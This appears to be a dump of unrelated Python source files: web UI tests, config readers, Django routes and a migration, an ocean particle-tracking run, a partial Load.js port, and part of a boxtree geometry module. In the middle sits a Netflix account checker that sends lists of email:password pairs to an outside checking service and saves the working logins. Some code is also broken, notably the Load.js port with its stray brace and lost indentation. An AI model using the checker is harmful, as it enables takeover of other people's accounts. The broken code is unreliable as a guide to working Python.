        driver.get("http://34.67.113.188:30753/")
        return driver

    def test_search_title(self):
        # Looking for the string "simple" in the heading
        driver = self._open_home()
        title = driver.find_element(By.TAG_NAME, "h2")
        self.assertIn("Simple", title.text)

    def test_search_heading(self):
        driver = self._open_home()
        heading = driver.find_element(By.TAG_NAME, "h3")
        self.assertIn("Home", heading.text)

    def test_about_page(self):
        driver = self._open_home()
        driver.find_element(By.ID, "About Us").click()
        self.assertIn("about", driver.find_element(By.TAG_NAME, "b").text)

    def test_product_page(self):
        driver = self._open_home()
        driver.find_element(By.ID, "Products").click()
        self.assertIn("product", driver.find_element(By.TAG_NAME, "b").text)

    def test_contact_page(self):
        driver = self._open_home()
        driver.find_element(By.ID, "Contact").click()
        self.assertIn("contact", driver.find_element(By.TAG_NAME, "b").text)

    def tearDown(self):
        """Close the browser window after each test."""
        self.driver.close()
# Run the test suite when executed directly.
if __name__ == "__main__":
    unittest.main();
|
#-*- encoding: gb2312 -*-
import ConfigParser
import string, os, sys
import datetime
import time
class HbcIni:
    """Accessor for the hbc.conf settings (Python 2 ConfigParser).

    Exposes the Oracle ([KAKOU]/[HBC]), MySQL ([MYSQLSET]) and system
    ([SYSTSET]) sections as plain dicts, and can persist a new checkpoint
    time back to the file.
    """

    def __init__(self, confpath='hbc.conf'):
        """Parse *confpath* into self.cf."""
        self.confpath = confpath
        self.cf = ConfigParser.ConfigParser()
        self.cf.read(self.confpath)

    def str2time(self, timestr):
        """Convert 'YYYY-mm-dd HH:MM:SS' text into a datetime object."""
        parsed = time.strptime(timestr, '%Y-%m-%d %H:%M:%S')
        return datetime.datetime(*parsed[:6])

    def _section_strings(self, section, keys):
        """Fetch *keys* from *section* as a dict of raw strings."""
        return dict((key, self.cf.get(section, key)) for key in keys)

    def getKakou(self):
        """Connection settings from the [KAKOU] section."""
        return self._section_strings('KAKOU', ('host', 'user', 'passwd', 'port', 'sid'))

    def getHbc(self):
        """Connection settings from the [HBC] section."""
        return self._section_strings('HBC', ('host', 'user', 'passwd', 'port', 'sid'))

    def getMysql(self):
        """MySQL settings from [MYSQLSET]; 'port' is returned as an int."""
        conf = self._section_strings('MYSQLSET', ('host', 'user', 'passwd', 'db', 'charset'))
        conf['port'] = self.cf.getint('MYSQLSET', 'port')
        return conf

    def getSyst(self):
        """System settings: checkpoint time (as datetime) and image path."""
        return {
            'time': self.str2time(self.cf.get('SYSTSET', 'time')),
            'imgpath': self.cf.get('SYSTSET', 'imgpath'),
        }

    def setSyst(self, c_time):
        """Persist a new [SYSTSET] time value back to the config file."""
        self.cf.set('SYSTSET', 'time', c_time)
        fh = open(self.confpath, 'w')
        self.cf.write(fh)
        fh.close()
if __name__ == "__main__":
    # Smoke test (Python 2): dump the [SYSTSET] section; on a missing
    # option, show the error and pause so the console stays readable.
    try:
        hbcini = HbcIni()
        print hbcini.getSyst()
        #s = imgIni.getPlateInfo(PATH2)
    except ConfigParser.NoOptionError,e:
        print e
        time.sleep(10)
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Time : 2018/10/21 21:13
# @Author : Administrator
# @Site :
# @File : Python练习实例71.py
# @Software: PyCharm
"""
题目:
编写input()和output()函数输入,输出5个学生的数据记录。
-----------------------------------------------------
思路:
-----------------------------------------------------
"""
# Number of student records to collect.
N = 5
# Each record: [student number, name, [three scores]].
stu = [['', '', []] for i in range(N)]
def stu_input(stu):
    """Prompt for N student records in place (Python 2 interactive I/O)."""
    for i in range(N):
        stu[i][0] = raw_input("input student's num:")
        stu[i][1] = raw_input("input student's name:")
        for j in range(3):
            # Python 2 input() evaluates the entry, yielding numeric scores.
            stu[i][2].append(input("input student's score:"))
def stu_output(stu):
    # Print each record (Python 2): id/name line, then the three scores.
    for i in range(N):
        print "num:(%s) name(%s)" % (stu[i][0], stu[i][1])
        for j in range(3):
            print "score %d: %d" % (j + 1, stu[i][2][j])
if __name__ == '__main__':
    # Collect the records, echo the raw structure, then pretty-print it.
    stu_input(stu)
    print stu
    stu_output(stu)
|
#!/usr/bin/python
#coding:utf-8
from django.conf.urls import url
from . import searchroute as route
# URL routes for the search app: landing page, results page, detail page.
urlpatterns = [
    url(r'^$', route.indexpage, name='search'),
    url(r'^searchmain/$', route.mainpage, name='searchmain'),
    url(r'^searchdetail/$', route.detailpage, name='searchdetail'),
]
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 13 15:31:22 2017
@author: nooteboom
"""
from parcels import (ParticleSet, JITParticle, AdvectionRK4_3D,
ErrorCode, ParticleFile, Variable, Field)
from datetime import timedelta as delta
from datetime import datetime
import numpy as np
from glob import glob
import sys
import setfieldsets as setf
import popkernels as popk
# Input data locations (NEMO hydrodynamics and POP model data).
dirread_top = '/projects/0/topios/hydrodynamic_data/NEMO-MEDUSA/ORCA0083-N006/'
dirread_pop = '/projects/0/palaeo-parcels/POP/POPdata/'
sp = 6. #The sinkspeed m/day
dd = 10. #The dwelling depth
res = 1 #resolution in degrees
Cs = float(sys.argv[1]) #Diffusion paramete
gmbol = False # Put to true for GM parameterisation/bolus speed
posidx = int(sys.argv[2]) #ID of the file to define latitude and longitude ranges
dirwrite = '/projects/0/palaeo-parcels/POP/POPres/particlefiles/sp%d_dd%d/'%(int(sp),int(dd))
# determine the release grid and the indices to load:
# each posidx selects one latitude band (full 360 degrees of longitude)
# together with the grid-row range needed to cover it.
if(posidx==1):
    lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(-79, -62)+0.5)
    ind = {'lat':range(0, 83)}
elif(posidx==2):
    lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(-62, -45)+0.5)
    ind = {'lat':range(0, 120)}
elif(posidx==3):
    lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(-45, -27)+0.5)
    ind = {'lat':range(33, 140)}
elif(posidx==4):
    lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(-27, -9)+0.5)
    ind = {'lat':range(70, 200)}
elif(posidx==5):
    lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(-9, 9)+0.5)
    ind = {'lat':range(90, 300)}
elif(posidx==6):
    lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(9, 27)+0.5)
    ind = {'lat':range(170, 320)}
elif(posidx==7):
    lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(27, 45)+0.5)
    ind = {'lat':range(220, 350)}
elif(posidx==8):
    lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(45, 62)+0.5)
    ind = {'lat':range(270, 384)}
elif(posidx==9):
    lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(62, 71)+0.5)
    ind = {'lat':range(300, 384)}
# reshape longitudes and latitudes
lons = lons.flatten(); lats = lats.flatten();
lonsz = []; latsz = [];
lons[lons>320.01] -= 360
# Delete the particles on land
bathy = Field.from_netcdf([dirread_pop+'bathymetry_POP_lowres_320t384.nc'], 'Bathymetry',
                          {'lon':'ULONG','lat':'ULAT'}, interp_method='bgrid_tracer')
grid = bathy.grid
grid.add_periodic_halo(zonal=True, meridional=False, halosize=20)
bathy.grid = grid
bathy.add_periodic_halo(zonal=True, meridional=False, halosize=20)
for i in range(lons.shape[0]):
    # keep only release points over water (positive bathymetry)
    if(bathy[0,0,lats[i], lons[i]]>0):
        lonsz.append(lons[i])
        latsz.append(lats[i])
# The boundary of the grid is at 320 degrees
lonsz = np.array(lonsz); latsz = np.array(latsz);
lonsz[lonsz>320.01] -= 360
if(not lonsz.size):
    sys.exit("Only land in the run with this idx %d"%(posidx))
dep = dd * np.ones(latsz.shape)
# Release times: every 3 days backwards from 2004-12-30, first 140 dates;
# the release grid is repeated once per release time.
times = np.array([datetime(2004, 12, 30) - delta(days=x) for x in range(0,int(365*4),3)])[:140]
time = np.empty(shape=(0));lons = np.empty(shape=(0));lats = np.empty(shape=(0));
for i in range(len(times)):
    lons = np.append(lons,lonsz)
    lats = np.append(lats, latsz)
    time = np.append(time, np.full(len(lonsz),times[i]))
def run_corefootprintparticles(dirwrite,outfile,lonss,latss,dep):
    """Advect sinking/dwelling particles backwards through the POP fields
    and write their footprints to dirwrite/outfile.

    Builds the fieldset (with or without the GM bolus velocity), attaches
    the run constants, then executes the Sink/advection/Age/periodicBC
    kernel chain for 5 years at dt = -15 min (backtracking).
    """
    files = sorted(glob(dirread_pop+'control_PD_1egree_extra_BOLUS/tavg/t.*'))
    dfile = [dirread_pop+'control_PD_1egree/t.x1_SAMOC_flux.160001.interp.nc']
    bfile = [dirread_pop+'bathymetry_POP_lowres_320t384.nc']
    dimfile = [dirread_pop+'coordinates_curvilinear_pop_grid_320x384.nc']
    afile = [dirread_pop+'spinup_B_2000_cam5_f09_g16.pop.h.1000-01.nc']
    if(gmbol):
        fieldset = setf.set_pop_fieldset_bolus(files, dimfile, dfile, bfile,afile, indices = ind)
    else:
        fieldset = setf.set_pop_fieldset(files, dimfile, dfile, bfile, afile, indices = ind)
    fieldset.add_periodic_halo(zonal=True, halosize=20)
    fieldset.add_constant('dwellingdepth', np.float(dd))
    # sink speed converted from m/day to m/s
    fieldset.add_constant('sinkspeed', sp/86400.)
    fieldset.add_constant('maxage', 300000.*86400)
    fieldset.add_constant('surface', 5.00622)
    fieldset.add_constant('gmbol', gmbol)
    fieldset.add_constant('Cs', Cs)

    class DinoParticle(JITParticle):
        # Sampled temperature/salinity plus bookkeeping of the particle's
        # origin and beaching state.
        temp = Variable('temp', dtype=np.float32, initial=np.nan)
        age = Variable('age', dtype=np.float32, initial=0.)
        salin = Variable('salin', dtype=np.float32, initial=np.nan)
        lon0 = Variable('lon0', dtype=np.float32, initial=0.)
        lat0 = Variable('lat0', dtype=np.float32, initial=0.)
        depth0 = Variable('depth0',dtype=np.float32, initial=0.)
        beached = Variable('beached',dtype=np.float32, initial=0.)

    pset = ParticleSet.from_list(fieldset=fieldset, pclass=DinoParticle, lon=lonss.tolist(), lat=latss.tolist(),
                                 time = time)
    pfile = ParticleFile(dirwrite + outfile, pset, write_ondelete=True)
    # Choose the advection kernel; Smagorinsky diffusion is only added when
    # a positive diffusion parameter Cs was passed on the command line.
    if(gmbol):
        advectionkernel = pset.Kernel(popk.AdvectionRK4_3D_addbolus)
        if(Cs>0):
            advectionkernel += popk.smagorinsky_bolus
    else:
        advectionkernel = pset.Kernel(AdvectionRK4_3D)
        if(Cs>0):
            advectionkernel += popk.smagorinsky
    kernels = pset.Kernel(popk.initials) + popk.Sink + advectionkernel + popk.Age + popk.periodicBC
    pset.execute(kernels, runtime=delta(days=5*365), dt=delta(minutes=-15), output_file=pfile, verbose_progress=False, recovery={ErrorCode.ErrorOutOfBounds: popk.DeleteParticle})
    print('Execution finished')
# Output file name encodes the run configuration (GM flag, Cs, band id,
# dwelling depth, sink speed, resolution), then the run is started.
if(gmbol):
    outfile = "grid_smagorinskiwn_gm_Cs"+str(Cs)+"_id"+str(posidx)+'_dd'+str(int(dd)) +'_sp'+str(int(sp))+"_res"+str(res)
else:
    outfile = "grid_smagorinskiwn_Cs"+str(Cs)+"_id"+str(posidx)+'_dd'+str(int(dd)) +'_sp'+str(int(sp))+"_res"+str(res)
run_corefootprintparticles(dirwrite,outfile,lons,lats,dep)
|
#!/usr/bin/python
""" A Python implementation of Load.js.
See Load.js's documentation for more details on what many of the properties do, as well as how the system works. This
module provides many methods of that package in Python with the same names and signatures.
"""
import os
from os import path
from sys import stderr
import re
import json
from six import string_types
class LoadHandler(object):
    """Override this class to change how the LoadState works."""

    def load_file(self, state, file, packs, type):
        """Default file loader: immediately provide every package in *packs*."""
        state.printMsg("Loading file "+file)
        for pack in packs:
            state.provide(pack, type)

    def evaluate(self, state, pack, type):
        """Evaluate a single package by requiring each of its dependencies."""
        state.printMsg("Evaluating "+pack)
        for dep in state.getDependencies(pack):
            state.require(dep)
        state.printMsg("Done evaluating "+pack)
class LoadState(object):
STATE_NONE = 0
STATE_SEEN = 1
STATE_IMPORTING = 2
STATE_IMPORTED = 3
STATE_RUNNING = 4
STATE_RAN = 5
TYPE_PACK = 0
TYPE_RES = 1
TYPE_EXT = 2
TYPE_BINRES = 3
def __init__(self, handler=None, noisy=False):
self._packs = {}
self._files = {}
self._importSet = set()
self._depFiles = {}
self._currentEval = None
self._noisy = noisy
self._defered = []
self._importStack = []
if handler:
self._handler = handler
else:
self._handler = LoadHandler()
def printMsg(self, msg):
if self._noisy:
print(msg);
def provide(self, name, type):
self.printMsg("Provided "+name)
if name in self._packs:
if self._packs[name]["state"] >= LoadState.STATE_IMPORTING:
self._packs[name]["state"] = LoadState.STATE_IMPORTED
else:
self._packs[name]["state"] = LoadState.STATE_SEEN
else:
self._packs[name] = {
"file":"about:blank",
"state":LoadState.STATE_SEEN,
"deps":[],
"size":0,
"type":type,
"evalOnImport":False
}
if self._packs[name]["state"] == LoadState.STATE_SEEN:
return
self._tryImport()
def require(self, name):
defer = name.startswith(">")
ret = None
if defer:
name = name[1:]
if not defer: self._importStack.append(name)
if not defer and self._packs[name].state == STATE_RUNNING:
stderr.writeln("Unsatisfiable dependence with {}, require chain has loops. ({})"
.format(name, " > ".join(_importStack)))
}
if name in self._packs:
if not defer:
ret = self.evaluate(name)
else:
self._defered.append(name)
if not defer: self._importStack.pop()
if len(self._importStack) == 0 and self._defered:
self.require(self._defered.pop())
return ret;
def evaluate(self, name):
if self._packs[name]["state"] == LoadState.STATE_RUNNING:
return
if self._packs[name]["state"] == LoadState.STATE_IMPORTED:
oldCur = self._currentEval
self._currentEval = name
self._packs[name]["state"] = LoadState.STATE_RUNNING
self._handler.evaluate(self, name, self._packs[name]["type"])
self._packs[name]["state"] = LoadState.STATE_RAN
self._currentEval = oldCur
def importPack(self, name):
if not self.isImported(name):
oldName = name
if name.startswith(">"):
name = name[1:]
self._addToImportSet(oldName)
self._tryImport()
def _addToImportSet(self, pack):
if pack in self._importSet:
return
if self._packs[pack]["state"] >= LoadState.STATE_IMPORTING:
return
self._importSet.add(pack)
p = self._packs[pack]
for d in p["deps"]:
if d.startswith(">"):
self._addToImportSet(d[1:])
else:
self._addToImportSet(d)
	def _tryImport(self, trace=False):
		"""Import every queued package whose hard dependencies are met.

		A package may be imported once each of its non-deferred
		dependencies is either already imported or provided by the same
		file.  Satisfied packages are removed from ``self._importSet``
		and handed to ``_doImportFile``.  *trace* is reserved for debug
		tracing (currently unimplemented).
		"""
		if not self._importSet:
			return
		toImport = set()
		for p in self._importSet:
			now = self._packs[p]
			okay = True
			for d in now["deps"]:
				if d.startswith(">"):
					# Deferred dependency ("<" stripped ">" prefix): never blocks.
					pass
				elif d not in self._packs:
					# TODO: WARNING -- unknown dependency is silently ignored.
					pass
				elif self._packs[d]["state"] < LoadState.STATE_IMPORTED:
					# Not yet imported; only acceptable if it ships in the
					# same file as the package being considered.
					if self._packs[d]["file"] != now["file"]:
						okay = False
						if trace:
							# TODO: Trace
							pass
						break
			if okay:
				if now["state"] <= LoadState.STATE_SEEN:
					toImport.add(p)
		# Symmetric difference: drop the satisfied packages from the queue.
		self._importSet = self._importSet ^ toImport
		# Now import them all
		self.printMsg("Importing "+", ".join(toImport))
		for p in toImport:
			self._doImportFile(self._packs[p]["file"], self._packs[p]["type"], p)
def _doImportFile(self, file, type, pack):
f = self._files[file]
if self._packs[pack]["state"] == LoadState.STATE_SEEN:
self._packs[pack]["state"] = LoadState.STATE_IMPORTING
self.provide(pack, type)
else:
if file not in self._files:
self._files[file] = [[], [], False]
if f[2]:
return
f[2] = True
for p in f[0]:
self._packs[p]["state"] = LoadState.STATE_IMPORTING
self._handler.load_file(self, file, f[0], type)
def abort(self):
self._importSet = []
def isImported(self, name):
return name in self._packs and self._packs[name]["state"] >= LoadState.STATE_IMPORTED
	def addDependency(self, file, provided, required, size, type):
		"""Record that *file* provides packages *provided* and needs *required*.

		An existing pack record is overwritten only while the pack has not
		started loading (state <= STATE_NONE) and this file is either new
		to the file table or provides more packages than the previously
		recorded provider -- i.e. prefer the most complete provider.
		*size* and *type* are stored verbatim on every pack record.
		"""
		for p in provided:
			if (p not in self._packs)\
			or (self._packs[p]["state"] <= LoadState.STATE_NONE and\
			(self._packs[p]["file"] not in self._files or len(provided)>len(self._files[self._packs[p]["file"]][0]))\
			):
				self._packs[p] = {
					"file":file,
					"state":LoadState.STATE_NONE,
					"deps":required,
					"size":size,
					"type":type,
					"evalOnImport":False
				}
		self._files[file] = [provided, required, False]
def loadDepsObject(self, data, absolutePath):
if isinstance(data, string_types):
data = json.loads(data)
deps = data["packages"]
for d in deps:
if ":" not in d[0] and not d[0].startswith("/"):
d[0] = path.join(absolutePath, d[0])
self.addDependency(d[0], d[1], d[2], d[3], d[4])
# Logic for external deps
def loadDeps(self, file):
self.printMsg("Reading dependancy file "+file)
absolutePath = path.dirname(path.abspath(file))
with open(file, "r") as f:
data = f.read()
self.loadDepsObject(data, absolutePath)
def importAndEvaluate(self, pack):
self.importPack(pack)
self.evaluate(pack)
def lie(self, list, pack):
self.loadDeps(list)
self.importAndEvaluate(pack)
def getDependencies(self, pack):
return self._packs[pack]["deps"]
|
# Generated by Django 2.2.7 on 2019-12-02 17:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import utils.mixins
class Migration(migrations.Migration):
    """Initial schema for the booking app: City, Comfort, Passenger, Plane, Flight."""
    initial = True
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='City',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=20, unique=True)),
                ('lat', models.FloatField()),
                ('lon', models.FloatField()),
            ],
            options={
                'verbose_name_plural': 'cities',
                'ordering': ['name'],
            },
        ),
        migrations.CreateModel(
            name='Comfort',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('comfort_type', models.CharField(choices=[('ЭК', 'Эконом'), ('КМФ', 'Комфорт'), ('БИЗ', 'Бизнес'), ('ПКЛ', 'Первый класс')], default='', max_length=3)),
            ],
            options={
                'verbose_name_plural': 'comfort_types',
                'ordering': ['pk'],
            },
        ),
        migrations.CreateModel(
            name='Passenger',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('surname', models.CharField(max_length=20)),
                ('name', models.CharField(max_length=20)),
                ('patronymic', models.CharField(max_length=20)),
                # NOTE(review): max_length is not a valid option for
                # PositiveIntegerField (Django ignores it; system check
                # fields.W122), and an integer phone number drops leading
                # zeros -- consider CharField in the model plus a follow-up
                # migration.  Left as-is here to match the recorded model
                # state.
                ('phone', models.PositiveIntegerField(max_length=13, unique=True)),
                ('passport_series', models.CharField(max_length=2)),
                ('passport_number', models.CharField(max_length=7, unique=True)),
                ('email', models.EmailField(max_length=254, unique=True)),
            ],
            options={
                'verbose_name_plural': 'passengers',
                'ordering': ['surname'],
            },
        ),
        migrations.CreateModel(
            name='Plane',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('plane_num', models.CharField(default='', max_length=5, unique=True)),
                ('plane_model', models.CharField(default='AirBus A319', max_length=20)),
                ('dep_time', models.TimeField()),
                ('arr_time', models.TimeField()),
                ('comfort_type', models.CharField(choices=[('ЭК', 'Эконом'), ('КМФ', 'Комфорт'), ('БИЗ', 'Бизнес'), ('ПКЛ', 'Первый класс')], default='', max_length=3)),
                ('arr_station', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='arrival_plane', to='booking.City')),
                ('dep_station', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='departure_plane', to='booking.City')),
                # NOTE(review): default='3' is a string default for an
                # integer user pk; presumably a hard-coded fallback user id
                # -- verify against the model definition.
                ('user', models.ForeignKey(default='3', on_delete=django.db.models.deletion.CASCADE, related_name='user_info', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name_plural': 'planes',
                'ordering': ['dep_station'],
            },
        ),
        migrations.CreateModel(
            name='Flight',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('booked_plane', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_plane', to='booking.Plane')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_flight', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name_plural': 'flights',
                'ordering': ['user'],
            },
            bases=(utils.mixins.StrReprMixin, models.Model),
        ),
    ]
|
for i in range(5):
print(('*'*(5-i)) + (" "*i*2) + ('*'*(5-i)))
for i in range(1,6):
print(('*'*i) + (" "*2*(5-i)) + ('*'*i))
|
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
#Author D4RK5H4D0W5
C0 = "\033[0;36m"
C1 = "\033[1;36m"
G0 = "\033[0;32m"
G1 = "\033[1;32m"
W0 = "\033[0;37m"
W1 = "\033[1;37m"
R0 = "\033[0;31m"
R1 = "\033[1;31m"
try: import requests, sys, os, json
except: os.system('pip2 install requests')
try:
os.system('clear')
print '''%s
_ __ __ ______
/ |/ /__ / /_/ _/ (_)_ __ %sCoded by Ahmdo%s
/ / -_) __/ _/ / /\ \ / %sNetflix Account Checker%s
/_/|_/\__/\__/_//_/_//_\_\ %netflix.com
'''%(C1,W0,C1,W0,C1,W0)
for akun in open(sys.argv[1]).read().splitlines():
api=requests.post('https://checkers.run/nf-free/check-account',data={'account':akun}).text
js=json.loads(api)
if js['limit'] == True:
exit('%s[ %sLIMIT %s] Change your IP'%(W0,R0,W0))
elif js['screens'] == '-':
print '%s[ %sNot working %s] %s'%(W0,R0,W0,akun)
else:
print '%s[ %sWorking %s] %s'%(W0,G0,W0,akun)
print '%s[ %sScreens %s] %s'%(W0,G0,W0,js['screens'])
print '%s[ %sLanguage%s] %s'%(W0,G0,W0,js['language'])
print '%s[ %s Valid %s] %s'%(W0,G0,W0,js['until'])
open('working.txt','a+').write(akun+'\n')
print
print
print '%s[ %sDONE %s] Saved in working.txt'%(W0,G0,W0)
except requests.exceptions.ConnectionError:
exit('%s[%s!%s] %sCheck internet'%(W1,R1,W1,W0))
except IndexError:
exit('%s[%s!%s] %sUse : python2 %s target.txt \n%s[%s!%s] %sFill in target.txt as follows user@email.com:password'%(W1,R1,W1,W0,sys.argv[0],W1,R1,W1,W0))
except IOError:
exit('%s[%s!%s] %sFile does not exist'%(W1,R1,W1,W0))
except KeyboardInterrupt:
exit('\n%s[%s!%s] %sExit'%(W1,R1,W1,W0))
|
__copyright__ = """
Copyright (C) 2013 Andreas Kloeckner
Copyright (C) 2016 Matt Wala"""
__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import logging
from functools import partial
import numpy as np
from mako.template import Template
import pyopencl as cl
import pyopencl.array # noqa
import pyopencl.cltypes # noqa
from pytools import ProcessLogger, memoize_method
from boxtree.tools import (
AXIS_NAMES, DeviceDataRecord, coord_vec_subscript_code, get_coord_vec_dtype)
logger = logging.getLogger(__name__)
__doc__ = """
Area queries (Balls -> overlapping leaves)
------------------------------------------
.. autoclass:: AreaQueryBuilder
.. autoclass:: AreaQueryResult
Inverse of area query (Leaves -> overlapping balls)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. autoclass:: LeavesToBallsLookupBuilder
.. autoclass:: LeavesToBallsLookup
Space invader queries
^^^^^^^^^^^^^^^^^^^^^
.. autoclass:: SpaceInvaderQueryBuilder
Peer Lists
^^^^^^^^^^
Area queries are implemented using peer lists.
.. autoclass:: PeerListFinder
.. autoclass:: PeerListLookup
"""
# {{{ output
class PeerListLookup(DeviceDataRecord):
    """
    .. attribute:: tree
        The :class:`boxtree.Tree` instance used to build this lookup.
    .. attribute:: peer_list_starts
        Indices into :attr:`peer_lists`.
        ``peer_lists[peer_list_starts[box_id]:peer_list_starts[box_id+1]]``
        contains the list of peer boxes of box `box_id`.
    .. attribute:: peer_lists
    .. automethod:: get
    .. versionadded:: 2016.1
    """
class AreaQueryResult(DeviceDataRecord):
    """
    .. attribute:: tree
        The :class:`boxtree.Tree` instance used to build this lookup.
    .. attribute:: leaves_near_ball_starts
        Indices into :attr:`leaves_near_ball_lists`.
        ``leaves_near_ball_lists[leaves_near_ball_starts[ball_nr]:
        leaves_near_ball_starts[ball_nr+1]]``
        results in a list of leaf boxes that intersect `ball_nr`.
    .. attribute:: leaves_near_ball_lists
    .. automethod:: get
    .. versionadded:: 2016.1
    """
class LeavesToBallsLookup(DeviceDataRecord):
    """
    .. attribute:: tree
        The :class:`boxtree.Tree` instance used to build this lookup.
    .. attribute:: balls_near_box_starts
        Indices into :attr:`balls_near_box_lists`.
        ``balls_near_box_lists[balls_near_box_starts[ibox]:
        balls_near_box_starts[ibox+1]]``
        results in a list of balls that overlap leaf box *ibox*.
    .. note:: Only leaf boxes have non-empty entries in this table. Nonetheless,
        this list is indexed by the global box index.
    .. attribute:: balls_near_box_lists
    .. automethod:: get
    """
# }}}
# {{{ kernel templates
GUIDING_BOX_FINDER_MACRO = r"""//CL:mako//
<%def name="initialize_coord_vec(vector_name, entries)">
<% assert len(entries) == dimensions %>
${vector_name} = (coord_vec_t) (${", ".join(entries)});
</%def>
<%def name="find_guiding_box(ball_center, ball_radius, box='guiding_box')">
box_id_t ${box} = 0;
{
//
// Step 1: Ensure that the center is within the bounding box.
//
coord_vec_t query_center, bbox_min, bbox_max;
${initialize_coord_vec(
"bbox_min", ["bbox_min_" + ax for ax in AXIS_NAMES[:dimensions]])}
// bbox_max should be smaller than the true bounding box, so that
// (query_center - bbox_min) / root_extent entries are in the half open
// interval [0, 1).
bbox_max = bbox_min + (coord_t) (
root_extent / (1 + ${root_extent_stretch_factor}));
query_center = min(bbox_max, max(bbox_min, ${ball_center}));
//
// Step 2: Compute the query radius. This can be effectively
// smaller than the original ball radius, if the center
// isn't in the bounding box (see picture):
//
// +-----------+
// | |
// | |
// | |
// +-------|-+ |
// | | | |
// | +-----------+ <= bounding box
// | |
// | |
// +---------+ <= query box
//
// <---> <= original radius
// <> <= effective radius
//
coord_t query_radius = 0;
%for mnr in range(2**dimensions):
{
coord_vec_t offset;
${initialize_coord_vec("offset",
["{sign}{ball_radius}".format(
sign="+" if (2**(dimensions-1-idim) & mnr) else "-",
ball_radius=ball_radius)
for idim in range(dimensions)])}
coord_vec_t corner = min(
bbox_max, max(bbox_min, ${ball_center} + offset));
coord_vec_t dist = fabs(corner - query_center);
%for i in range(dimensions):
query_radius = fmax(query_radius, ${cvec_sub("dist", i)});
%endfor
}
%endfor
//
// Step 3: Find the guiding box.
//
// Descend when root is not the guiding box.
if (LEVEL_TO_RAD(0) / 2 >= query_radius)
{
for (unsigned box_level = 0;; ++box_level)
{
if (/* Found leaf? */
!(box_flags[${box}] & BOX_HAS_SOURCE_OR_TARGET_CHILD_BOXES)
/* Found guiding box? */
|| (LEVEL_TO_RAD(box_level) / 2 < query_radius
&& query_radius <= LEVEL_TO_RAD(box_level)))
{
break;
}
// Find the child containing the ball center.
//
// Logic intended to match the morton nr scan kernel.
coord_vec_t offset_scaled =
(query_center - bbox_min) / root_extent;
// Invariant: offset_scaled entries are in [0, 1).
%for ax in AXIS_NAMES[:dimensions]:
unsigned ${ax}_bits = (unsigned) (
offset_scaled.${ax} * (1U << (1 + box_level)));
%endfor
// Pick off the lowest-order bit for each axis, put it in
// its place.
int level_morton_number = 0
%for iax, ax in enumerate(AXIS_NAMES[:dimensions]):
| (${ax}_bits & 1U) << (${dimensions-1-iax})
%endfor
;
box_id_t next_box = box_child_ids[
level_morton_number * aligned_nboxes + ${box}];
if (next_box)
{
${box} = next_box;
}
else
{
// Child does not exist, this must be the guiding box
break;
}
}
}
}
</%def>
"""
AREA_QUERY_WALKER_BODY = r"""
coord_vec_t ball_center;
coord_t ball_radius;
${get_ball_center_and_radius("ball_center", "ball_radius", "i")}
///////////////////////////////////
// Step 1: Find the guiding box. //
///////////////////////////////////
${find_guiding_box("ball_center", "ball_radius")}
//////////////////////////////////////////////////////
// Step 2 - Walk the peer boxes to find the leaves. //
//////////////////////////////////////////////////////
for (peer_list_idx_t pb_i = peer_list_starts[guiding_box],
pb_e = peer_list_starts[guiding_box+1]; pb_i < pb_e; ++pb_i)
{
box_id_t peer_box = peer_lists[pb_i];
if (!(box_flags[peer_box] & BOX_HAS_SOURCE_OR_TARGET_CHILD_BOXES))
{
bool is_overlapping;
${check_l_infty_ball_overlap(
"is_overlapping", "peer_box", "ball_radius", "ball_center")}
if (is_overlapping)
{
${leaf_found_op("peer_box", "ball_center", "ball_radius")}
}
}
else
{
${walk_init("peer_box")}
while (continue_walk)
{
${walk_get_box_id()}
if (walk_box_id)
{
if (!(box_flags[walk_box_id]
& BOX_HAS_SOURCE_OR_TARGET_CHILD_BOXES))
{
